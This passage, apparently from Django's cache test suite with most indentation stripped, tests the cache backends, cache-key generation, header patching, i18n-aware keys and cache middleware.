# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
def test_set_many_returns_failing_keys(self):
def fail_set_multi(mapping, *args, **kwargs):
return mapping.keys()
with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi):
failing_keys = cache.set_many({'key': 'value'})
self.assertEqual(failing_keys, ['key'])
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
client_library_name = 'memcache'
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
    Settings whose cache configuration sets TIMEOUT=None create caches that
    set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
        a non-expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Timezone-dependent cache keys should use ASCII characters only
# (#17476). The implementation here is a bit odd (timezone.utc is an
# instance, not a class), but it simulates the correct conditions.
class CustomTzName(timezone.utc):
pass
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName):
CustomTzName.zone = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(
sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active"
)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with a non-empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super().setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
The constructor distinguishes between CacheMiddleware being used as
middleware and CacheMiddleware being used as a view decorator, and sets
its attributes appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
